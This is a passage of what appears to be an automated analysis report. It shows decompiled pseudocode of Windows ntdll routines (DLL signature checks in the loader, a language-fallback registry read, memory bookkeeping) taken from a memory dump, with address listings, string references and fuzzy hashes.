                                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                          						_t124 = 0xc000007b;
                                                          						goto L8;
                                                          					}
                                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                          					 *(_t125 + 0x34) = _t73;
                                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                          						goto L3;
                                                          					}
                                                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                          					_t124 = E0186C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                          					if(_t124 < 0) {
                                                          						goto L8;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          				} else {
                                                          					L3:
                                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                          						L8:
                                                          						return _t124;
                                                          					}
                                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                          							goto L5;
                                                          						}
                                                          						_t102 =  *0x1955780; // 0x0
                                                          						if((_t102 & 0x00000003) != 0) {
                                                          							E018E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                          							_t102 =  *0x1955780; // 0x0
                                                          						}
                                                          						if((_t102 & 0x00000010) != 0) {
                                                          							asm("int3");
                                                          						}
                                                          						_t124 = 0xc0000428;
                                                          						goto L8;
                                                          					}
                                                          					L5:
                                                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                          						goto L8;
                                                          					}
                                                          					_t77 = _a4 - 0x40000003;
                                                          					if(_t77 == 0 || _t77 == 0x33) {
                                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                          						if(E01887D50() != 0) {
                                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                          						} else {
                                                          							_t82 = 0x7ffe0384;
                                                          						}
                                                          						_t108 = 0x7ffe0385;
                                                          						if( *_t82 != 0) {
                                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                          								if(E01887D50() == 0) {
                                                          									_t97 = 0x7ffe0385;
                                                          								} else {
                                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                          								}
                                                          								if(( *_t97 & 0x00000020) != 0) {
                                                          									E018E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a4 != 0x40000003) {
                                                          							L14:
                                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                          							if(E01887D50() != 0) {
                                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                          							} else {
                                                          								_t87 = 0x7ffe0384;
                                                          							}
                                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                          								if(E01887D50() != 0) {
                                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                          								}
                                                          								if(( *_t108 & 0x00000020) != 0) {
                                                          									E018E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                          								}
                                                          							}
                                                          							goto L8;
                                                          						} else {
                                                          							_v16 = _t125 + 0x24;
                                                          							_t124 = E0189A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                          							if(_t124 < 0) {
                                                          								E0186B1E1(_t124, 0x1490, 0, _v16);
                                                          								goto L8;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          					} else {
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}




















                                                          0x01877e4c
                                                          0x01877e50
                                                          0x01877e55
                                                          0x01877e58
                                                          0x01877e5d
                                                          0x01877e71
                                                          0x01877f33
                                                          0x01877e77
                                                          0x01877e77
                                                          0x01877e79
                                                          0x01877e79
                                                          0x01877e7e
                                                          0x01877f45
                                                          0x018c9848
                                                          0x00000000
                                                          0x018c9848
                                                          0x01877f4e
                                                          0x01877f53
                                                          0x01877f5a
                                                          0x00000000
                                                          0x00000000
                                                          0x018c985a
                                                          0x018c9862
                                                          0x018c9866
                                                          0x00000000
                                                          0x018c986c
                                                          0x00000000
                                                          0x018c986c
                                                          0x01877e84
                                                          0x01877e84
                                                          0x01877e8d
                                                          0x018c9871
                                                          0x01877eb8
                                                          0x01877ec0
                                                          0x01877ec0
                                                          0x01877e9a
                                                          0x018c987e
                                                          0x00000000
                                                          0x00000000
                                                          0x018c9884
                                                          0x018c988b
                                                          0x018c98a7
                                                          0x018c98ac
                                                          0x018c98b1
                                                          0x018c98b6
                                                          0x018c98b8
                                                          0x018c98b8
                                                          0x018c98b9
                                                          0x00000000
                                                          0x018c98b9
                                                          0x01877ea0
                                                          0x01877ea7
                                                          0x00000000
                                                          0x00000000
                                                          0x01877eac
                                                          0x01877eb1
                                                          0x01877ec6
                                                          0x01877ed0
                                                          0x018c98cc
                                                          0x01877ed6
                                                          0x01877ed6
                                                          0x01877ed6
                                                          0x01877ede
                                                          0x01877ee3
                                                          0x018c98e3
                                                          0x018c98f0
                                                          0x018c9902
                                                          0x018c98f2
                                                          0x018c98fb
                                                          0x018c98fb
                                                          0x018c9907
                                                          0x018c991d
                                                          0x018c991d
                                                          0x018c9907
                                                          0x018c98e3
                                                          0x01877ef0
                                                          0x01877f14
                                                          0x01877f14
                                                          0x01877f1e
                                                          0x018c9946
                                                          0x01877f24
                                                          0x01877f24
                                                          0x01877f24
                                                          0x01877f2c
                                                          0x018c996a
                                                          0x018c9975
                                                          0x018c9975
                                                          0x018c997e
                                                          0x018c9993
                                                          0x018c9993
                                                          0x018c997e
                                                          0x00000000
                                                          0x01877ef2
                                                          0x01877efc
                                                          0x01877f0a
                                                          0x01877f0e
                                                          0x018c9933
                                                          0x00000000
                                                          0x018c9933
                                                          0x00000000
                                                          0x01877f0e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01877eb1

                                                          Strings
                                                          • minkernel\ntdll\ldrmap.c, xrefs: 018C98A2
                                                          • LdrpCompleteMapModule, xrefs: 018C9898
                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 018C9891
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                          • API String ID: 0-1676968949
                                                          • Opcode ID: 8ff08272bcde6de46e770693a253d977ccc690553808d6ca253f43c17908908d
                                                          • Instruction ID: 0b01b7a9335f1992e58f6aec2ced9779b332a4644a246c0149fbc0b59b36d582
                                                          • Opcode Fuzzy Hash: 8ff08272bcde6de46e770693a253d977ccc690553808d6ca253f43c17908908d
                                                          • Instruction Fuzzy Hash: 8551D332A04745DBE721CB6CC948B6A7BE4EB01B18F1409A9EA51DB7E2D774EF00C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E0186E620(void* __ecx, short* __edx, short* _a4) {
                                                          				char _v16;
                                                          				char _v20;
                                                          				intOrPtr _v24;
                                                          				char* _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v52;
                                                          				void* _v56;
                                                          				void* _v60;
                                                          				char _v64;
                                                          				void* _v68;
                                                          				void* _v76;
                                                          				void* _v84;
                                                          				signed int _t59;
                                                          				signed int _t74;
                                                          				signed short* _t75;
                                                          				signed int _t76;
                                                          				signed short* _t78;
                                                          				signed int _t83;
                                                          				short* _t93;
                                                          				signed short* _t94;
                                                          				short* _t96;
                                                          				void* _t97;
                                                          				signed int _t99;
                                                          				void* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t80 = __ecx;
                                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                          				_t96 = __edx;
                                                          				_v44 = __edx;
                                                          				_t78 = 0;
                                                          				_v56 = 0;
                                                          				if(__ecx == 0 || __edx == 0) {
                                                          					L28:
                                                          					_t97 = 0xc000000d;
                                                          				} else {
                                                          					_t93 = _a4;
                                                          					if(_t93 == 0) {
                                                          						goto L28;
                                                          					}
                                                          					_t78 = E0186F358(__ecx, 0xac);
                                                          					if(_t78 == 0) {
                                                          						_t97 = 0xc0000017;
                                                          						L6:
                                                          						if(_v56 != 0) {
                                                          							_push(_v56);
                                                          							E018A95D0();
                                                          						}
                                                          						if(_t78 != 0) {
                                                          							L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                          						}
                                                          						return _t97;
                                                          					}
                                                          					E018AFA60(_t78, 0, 0x158);
                                                          					_v48 = _v48 & 0x00000000;
                                                          					_t102 = _t101 + 0xc;
                                                          					 *_t96 = 0;
                                                          					 *_t93 = 0;
                                                          					E018ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                          					_v36 = 0x18;
                                                          					_v28 =  &_v44;
                                                          					_v64 = 0;
                                                          					_push( &_v36);
                                                          					_push(0x20019);
                                                          					_v32 = 0;
                                                          					_push( &_v64);
                                                          					_v24 = 0x40;
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					_t97 = E018A9600();
                                                          					if(_t97 < 0) {
                                                          						goto L6;
                                                          					}
                                                          					E018ABB40(0,  &_v36, L"InstallLanguageFallback");
                                                          					_push(0);
                                                          					_v48 = 4;
                                                          					_t97 = L0186F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                          					if(_t97 >= 0) {
                                                          						if(_v52 != 1) {
                                                          							L17:
                                                          							_t97 = 0xc0000001;
                                                          							goto L6;
                                                          						}
                                                          						_t59 =  *_t78 & 0x0000ffff;
                                                          						_t94 = _t78;
                                                          						_t83 = _t59;
                                                          						if(_t59 == 0) {
                                                          							L19:
                                                          							if(_t83 == 0) {
                                                          								L23:
                                                          								E018ABB40(_t83, _t102 + 0x24, _t78);
                                                          								if(L018743C0( &_v48,  &_v64) == 0) {
                                                          									goto L17;
                                                          								}
                                                          								_t84 = _v48;
                                                          								 *_v48 = _v56;
                                                          								if( *_t94 != 0) {
                                                          									E018ABB40(_t84, _t102 + 0x24, _t94);
                                                          									if(L018743C0( &_v48,  &_v64) != 0) {
                                                          										 *_a4 = _v56;
                                                          									} else {
                                                          										_t97 = 0xc0000001;
                                                          										 *_v48 = 0;
                                                          									}
                                                          								}
                                                          								goto L6;
                                                          							}
                                                          							_t83 = _t83 & 0x0000ffff;
                                                          							while(_t83 == 0x20) {
                                                          								_t94 =  &(_t94[1]);
                                                          								_t74 =  *_t94 & 0x0000ffff;
                                                          								_t83 = _t74;
                                                          								if(_t74 != 0) {
                                                          									continue;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							goto L23;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          						while(1) {
                                                          							L14:
                                                          							_t27 =  &(_t94[1]); // 0x2
                                                          							_t75 = _t27;
                                                          							if(_t83 == 0x2c) {
                                                          								break;
                                                          							}
                                                          							_t94 = _t75;
                                                          							_t76 =  *_t94 & 0x0000ffff;
                                                          							_t83 = _t76;
                                                          							if(_t76 != 0) {
                                                          								continue;
                                                          							}
                                                          							goto L23;
                                                          						}
                                                          						 *_t94 = 0;
                                                          						_t94 = _t75;
                                                          						_t83 =  *_t75 & 0x0000ffff;
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}































                                                          0x0186e620
                                                          0x0186e628
                                                          0x0186e62f
                                                          0x0186e631
                                                          0x0186e635
                                                          0x0186e637
                                                          0x0186e63e
                                                          0x018c5503
                                                          0x018c5503
                                                          0x0186e64c
                                                          0x0186e64c
                                                          0x0186e651
                                                          0x00000000
                                                          0x00000000
                                                          0x0186e661
                                                          0x0186e665
                                                          0x018c542a
                                                          0x0186e715
                                                          0x0186e71a
                                                          0x0186e71c
                                                          0x0186e720
                                                          0x0186e720
                                                          0x0186e727
                                                          0x0186e736
                                                          0x0186e736
                                                          0x0186e743
                                                          0x0186e743
                                                          0x0186e673
                                                          0x0186e678
                                                          0x0186e67d
                                                          0x0186e682
                                                          0x0186e685
                                                          0x0186e692
                                                          0x0186e69b
                                                          0x0186e6a3
                                                          0x0186e6ad
                                                          0x0186e6b1
                                                          0x0186e6b2
                                                          0x0186e6bb
                                                          0x0186e6bf
                                                          0x0186e6c0
                                                          0x0186e6c8
                                                          0x0186e6cc
                                                          0x0186e6d5
                                                          0x0186e6d9
                                                          0x00000000
                                                          0x00000000
                                                          0x0186e6e5
                                                          0x0186e6ea
                                                          0x0186e6f9
                                                          0x0186e70b
                                                          0x0186e70f
                                                          0x018c5439
                                                          0x018c545e
                                                          0x018c545e
                                                          0x00000000
                                                          0x018c545e
                                                          0x018c543b
                                                          0x018c543e
                                                          0x018c5440
                                                          0x018c5445
                                                          0x018c5472
                                                          0x018c5475
                                                          0x018c548d
                                                          0x018c5493
                                                          0x018c54a9
                                                          0x00000000
                                                          0x00000000
                                                          0x018c54ab
                                                          0x018c54b4
                                                          0x018c54bc
                                                          0x018c54c8
                                                          0x018c54de
                                                          0x018c54fb
                                                          0x018c54e0
                                                          0x018c54e6
                                                          0x018c54eb
                                                          0x018c54eb
                                                          0x018c54de
                                                          0x00000000
                                                          0x018c54bc
                                                          0x018c5477
                                                          0x018c547a
                                                          0x018c5480
                                                          0x018c5483
                                                          0x018c5486
                                                          0x018c548b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x018c548b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x018c5447
                                                          0x018c5447
                                                          0x018c5447
                                                          0x018c5447
                                                          0x018c544e
                                                          0x00000000
                                                          0x00000000
                                                          0x018c5450
                                                          0x018c5452
                                                          0x018c5455
                                                          0x018c545a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x018c545c
                                                          0x018c546a
                                                          0x018c546d
                                                          0x018c546f
                                                          0x00000000
                                                          0x018c546f
                                                          0x0186e70f

                                                          Strings
                                                          • @, xrefs: 0186E6C0
                                                          • InstallLanguageFallback, xrefs: 0186E6DB
                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0186E68C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                          • API String ID: 0-1757540487
                                                          • Opcode ID: 7996c4d48074f19f0ded4569ea0c21a4072e094e167ffab9a6afe836c5e0a84c
                                                          • Instruction ID: 9ca40d8efa9d0fe3b0af2634b2fadb32a10aba563532e8900470aacb4ceb675d
                                                          • Opcode Fuzzy Hash: 7996c4d48074f19f0ded4569ea0c21a4072e094e167ffab9a6afe836c5e0a84c
                                                          • Instruction Fuzzy Hash: C151A6B56083469BDB14DF68D480AABB7E8BF98B14F45092EF985D7240F734EB04C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E0192E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                          				signed int _v20;
                                                          				char _v24;
                                                          				signed int _v40;
                                                          				char _v44;
                                                          				intOrPtr _v48;
                                                          				signed int _v52;
                                                          				unsigned int _v56;
                                                          				char _v60;
                                                          				signed int _v64;
                                                          				char _v68;
                                                          				signed int _v72;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				char _t87;
                                                          				signed int _t90;
                                                          				signed int _t94;
                                                          				signed int _t100;
                                                          				intOrPtr* _t113;
                                                          				signed int _t122;
                                                          				void* _t132;
                                                          				void* _t135;
                                                          				signed int _t139;
                                                          				signed int* _t141;
                                                          				signed int _t146;
                                                          				signed int _t147;
                                                          				void* _t153;
                                                          				signed int _t155;
                                                          				signed int _t159;
                                                          				char _t166;
                                                          				void* _t172;
                                                          				void* _t176;
                                                          				signed int _t177;
                                                          				intOrPtr* _t179;
                                                          
                                                          				_t179 = __ecx;
                                                          				_v48 = __edx;
                                                          				_v68 = 0;
                                                          				_v72 = 0;
                                                          				_push(__ecx[1]);
                                                          				_push( *__ecx);
                                                          				_push(0);
                                                          				_t153 = 0x14;
                                                          				_t135 = _t153;
                                                          				_t132 = E0192BBBB(_t135, _t153);
                                                          				if(_t132 == 0) {
                                                          					_t166 = _v68;
                                                          					goto L43;
                                                          				} else {
                                                          					_t155 = 0;
                                                          					_v52 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v56 = __ecx[1];
                                                          					if( *__ecx >> 8 < 2) {
                                                          						_t155 = 1;
                                                          						_v52 = 1;
                                                          					}
                                                          					_t139 = _a4;
                                                          					_t87 = (_t155 << 0xc) + _t139;
                                                          					_v60 = _t87;
                                                          					if(_t87 < _t139) {
                                                          						L11:
                                                          						_t166 = _v68;
                                                          						L12:
                                                          						if(_t132 != 0) {
                                                          							E0192BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                          						}
                                                          						L43:
                                                          						if(_v72 != 0) {
                                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                                          							_push( *_t179);
                                                          							_push(0x8000);
                                                          							E0192AFDE( &_v72,  &_v60);
                                                          						}
                                                          						L46:
                                                          						return _t166;
                                                          					}
                                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                          					asm("sbb edi, edi");
                                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                          					if(_t90 != 0) {
                                                          						_push(0);
                                                          						_push(0x14);
                                                          						_push( &_v44);
                                                          						_push(3);
                                                          						_push(_t179);
                                                          						_push(0xffffffff);
                                                          						if(E018A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                          							_push(_t139);
                                                          							E0192A80D(_t179, 1, _v40, 0);
                                                          							_t172 = 4;
                                                          						}
                                                          					}
                                                          					_t141 =  &_v72;
                                                          					if(E0192A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                          						_v64 = _a4;
                                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                          						asm("sbb edi, edi");
                                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                          						if(_t94 != 0) {
                                                          							_push(0);
                                                          							_push(0x14);
                                                          							_push( &_v24);
                                                          							_push(3);
                                                          							_push(_t179);
                                                          							_push(0xffffffff);
                                                          							if(E018A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                          								_push(_t141);
                                                          								E0192A80D(_t179, 1, _v20, 0);
                                                          								_t176 = 4;
                                                          							}
                                                          						}
                                                          						if(E0192A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_t177 = _v64;
                                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                          							_t100 = _v52 + _v52;
                                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                          							 *(_t132 + 0x10) = _t146;
                                                          							asm("bsf eax, [esp+0x18]");
                                                          							_v52 = _t100;
                                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                          							_t47 =  &_a8;
                                                          							 *_t47 = _a8 & 0x00000001;
                                                          							if( *_t47 == 0) {
                                                          								E01882280(_t179 + 0x30, _t179 + 0x30);
                                                          							}
                                                          							_t147 =  *(_t179 + 0x34);
                                                          							_t159 =  *(_t179 + 0x38) & 1;
                                                          							_v68 = 0;
                                                          							if(_t147 == 0) {
                                                          								L35:
                                                          								E0187B090(_t179 + 0x34, _t147, _v68, _t132);
                                                          								if(_a8 == 0) {
                                                          									E0187FFB0(_t132, _t177, _t179 + 0x30);
                                                          								}
                                                          								asm("lock xadd [eax], ecx");
                                                          								asm("lock xadd [eax], edx");
                                                          								_t132 = 0;
                                                          								_v72 = _v72 & 0;
                                                          								_v68 = _v72;
                                                          								if(E01887D50() == 0) {
                                                          									_t113 = 0x7ffe0388;
                                                          								} else {
                                                          									_t177 = _v64;
                                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                          								}
                                                          								if( *_t113 == _t132) {
                                                          									_t166 = _v68;
                                                          									goto L46;
                                                          								} else {
                                                          									_t166 = _v68;
                                                          									E0191FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                          									goto L12;
                                                          								}
                                                          							} else {
                                                          								L23:
                                                          								while(1) {
                                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                          										_t122 =  *_t147;
                                                          										if(_t159 == 0) {
                                                          											L32:
                                                          											if(_t122 == 0) {
                                                          												L34:
                                                          												_v68 = 0;
                                                          												goto L35;
                                                          											}
                                                          											L33:
                                                          											_t147 = _t122;
                                                          											continue;
                                                          										}
                                                          										if(_t122 == 0) {
                                                          											goto L34;
                                                          										}
                                                          										_t122 = _t122 ^ _t147;
                                                          										goto L32;
                                                          									}
                                                          									_t122 =  *(_t147 + 4);
                                                          									if(_t159 == 0) {
                                                          										L27:
                                                          										if(_t122 != 0) {
                                                          											goto L33;
                                                          										}
                                                          										L28:
                                                          										_v68 = 1;
                                                          										goto L35;
                                                          									}
                                                          									if(_t122 == 0) {
                                                          										goto L28;
                                                          									}
                                                          									_t122 = _t122 ^ _t147;
                                                          									goto L27;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					_v72 = _v72 & 0x00000000;
                                                          					goto L11;
                                                          				}
                                                          			}




































                                                          0x0192e547
                                                          0x0192e549
                                                          0x0192e54f
                                                          0x0192e553
                                                          0x0192e557
                                                          0x0192e55a
                                                          0x0192e55c
                                                          0x0192e55f
                                                          0x0192e561
                                                          0x0192e567
                                                          0x0192e56b
                                                          0x0192e7e2
                                                          0x00000000
                                                          0x0192e571
                                                          0x0192e575
                                                          0x0192e577
                                                          0x0192e57b
                                                          0x0192e57c
                                                          0x0192e57d
                                                          0x0192e57e
                                                          0x0192e57f
                                                          0x0192e588
                                                          0x0192e58f
                                                          0x0192e591
                                                          0x0192e592
                                                          0x0192e592
                                                          0x0192e596
                                                          0x0192e59e
                                                          0x0192e5a0
                                                          0x0192e5a6
                                                          0x0192e61d
                                                          0x0192e61d
                                                          0x0192e621
                                                          0x0192e623
                                                          0x0192e630
                                                          0x0192e630
                                                          0x0192e7e6
                                                          0x0192e7eb
                                                          0x0192e7ed
                                                          0x0192e7f4
                                                          0x0192e7fa
                                                          0x0192e7ff
                                                          0x0192e7ff
                                                          0x0192e80a
                                                          0x0192e812
                                                          0x0192e812
                                                          0x0192e5ab
                                                          0x0192e5b4
                                                          0x0192e5b9
                                                          0x0192e5be
                                                          0x0192e5c0
                                                          0x0192e5c2
                                                          0x0192e5c8
                                                          0x0192e5c9
                                                          0x0192e5cb
                                                          0x0192e5cc
                                                          0x0192e5d5
                                                          0x0192e5e4
                                                          0x0192e5f1
                                                          0x0192e5f8
                                                          0x0192e5f8
                                                          0x0192e5d5
                                                          0x0192e602
                                                          0x0192e616
                                                          0x0192e63d
                                                          0x0192e644
                                                          0x0192e64d
                                                          0x0192e652
                                                          0x0192e657
                                                          0x0192e659
                                                          0x0192e65b
                                                          0x0192e661
                                                          0x0192e662
                                                          0x0192e664
                                                          0x0192e665
                                                          0x0192e66e
                                                          0x0192e67d
                                                          0x0192e68a
                                                          0x0192e691
                                                          0x0192e691
                                                          0x0192e66e
                                                          0x0192e6b0
                                                          0x00000000
                                                          0x0192e6b6
                                                          0x0192e6bd
                                                          0x0192e6c7
                                                          0x0192e6d7
                                                          0x0192e6d9
                                                          0x0192e6db
                                                          0x0192e6de
                                                          0x0192e6e3
                                                          0x0192e6f3
                                                          0x0192e6fc
                                                          0x0192e700
                                                          0x0192e700
                                                          0x0192e704
                                                          0x0192e70a
                                                          0x0192e70a
                                                          0x0192e713
                                                          0x0192e716
                                                          0x0192e719
                                                          0x0192e720
                                                          0x0192e761
                                                          0x0192e76b
                                                          0x0192e774
                                                          0x0192e77a
                                                          0x0192e77a
                                                          0x0192e78a
                                                          0x0192e791
                                                          0x0192e799
                                                          0x0192e79b
                                                          0x0192e79f
                                                          0x0192e7aa
                                                          0x0192e7c0
                                                          0x0192e7ac
                                                          0x0192e7b2
                                                          0x0192e7b9
                                                          0x0192e7b9
                                                          0x0192e7c7
                                                          0x0192e806
                                                          0x00000000
                                                          0x0192e7c9
                                                          0x0192e7d1
                                                          0x0192e7d8
                                                          0x00000000
                                                          0x0192e7d8
                                                          0x00000000
                                                          0x00000000
                                                          0x0192e722
                                                          0x0192e72e
                                                          0x0192e748
                                                          0x0192e74c
                                                          0x0192e754
                                                          0x0192e756
                                                          0x0192e75c
                                                          0x0192e75c
                                                          0x00000000
                                                          0x0192e75c
                                                          0x0192e758
                                                          0x0192e758
                                                          0x00000000
                                                          0x0192e758
                                                          0x0192e750
                                                          0x00000000
                                                          0x00000000
                                                          0x0192e752
                                                          0x00000000
                                                          0x0192e752
                                                          0x0192e730
                                                          0x0192e735
                                                          0x0192e73d
                                                          0x0192e73f
                                                          0x00000000
                                                          0x00000000
                                                          0x0192e741
                                                          0x0192e741
                                                          0x00000000
                                                          0x0192e741
                                                          0x0192e739
                                                          0x00000000
                                                          0x00000000
                                                          0x0192e73b
                                                          0x00000000
                                                          0x0192e73b
                                                          0x0192e722
                                                          0x0192e720
                                                          0x0192e6b0
                                                          0x0192e618
                                                          0x00000000
                                                          0x0192e618

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                          • Instruction ID: ae09847a051a0eb25cb82762e79178eae76d4fe7cb1f48ea7a747cd0fdd016f7
                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                          • Instruction Fuzzy Hash: DB9182316043529FE725CE29C881B1BBBE9BFC4715F14892DFA99CB284E774E904CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E018E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed short* _t63;
                                                          				signed int _t64;
                                                          				signed int _t65;
                                                          				signed int _t67;
                                                          				intOrPtr _t74;
                                                          				intOrPtr _t84;
                                                          				intOrPtr _t88;
                                                          				intOrPtr _t94;
                                                          				void* _t100;
                                                          				void* _t103;
                                                          				intOrPtr _t105;
                                                          				signed int _t106;
                                                          				short* _t108;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int* _t115;
                                                          				signed short* _t117;
                                                          				void* _t118;
                                                          				void* _t119;
                                                          
                                                          				_push(0x80);
                                                          				_push(0x19405f0);
                                                          				E018BD0E8(__ebx, __edi, __esi);
                                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                          				_t115 =  *(_t118 + 0xc);
                                                          				 *(_t118 - 0x7c) = _t115;
                                                          				 *((char*)(_t118 - 0x65)) = 0;
                                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                          				_t113 = 0;
                                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                          				_t100 = __ecx;
                                                          				if(_t100 == 0) {
                                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                          					E0187EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                          					 *((char*)(_t118 - 0x65)) = 1;
                                                          					_t63 =  *(_t118 - 0x90);
                                                          					_t101 = _t63[2];
                                                          					_t64 =  *_t63 & 0x0000ffff;
                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                          					L20:
                                                          					_t65 = _t64 >> 1;
                                                          					L21:
                                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                          					if(_t108 == 0) {
                                                          						L27:
                                                          						 *_t115 = _t65 + 1;
                                                          						_t67 = 0xc0000023;
                                                          						L28:
                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                          						L29:
                                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                          						E018E53CA(0);
                                                          						return E018BD130(0, _t113, _t115);
                                                          					}
                                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                          							 *_t108 = 0;
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					 *_t115 = _t65;
                                                          					_t115 = _t65 + _t65;
                                                          					E018AF3E0(_t108, _t101, _t115);
                                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                          					_t67 = 0;
                                                          					goto L28;
                                                          				}
                                                          				_t103 = _t100 - 1;
                                                          				if(_t103 == 0) {
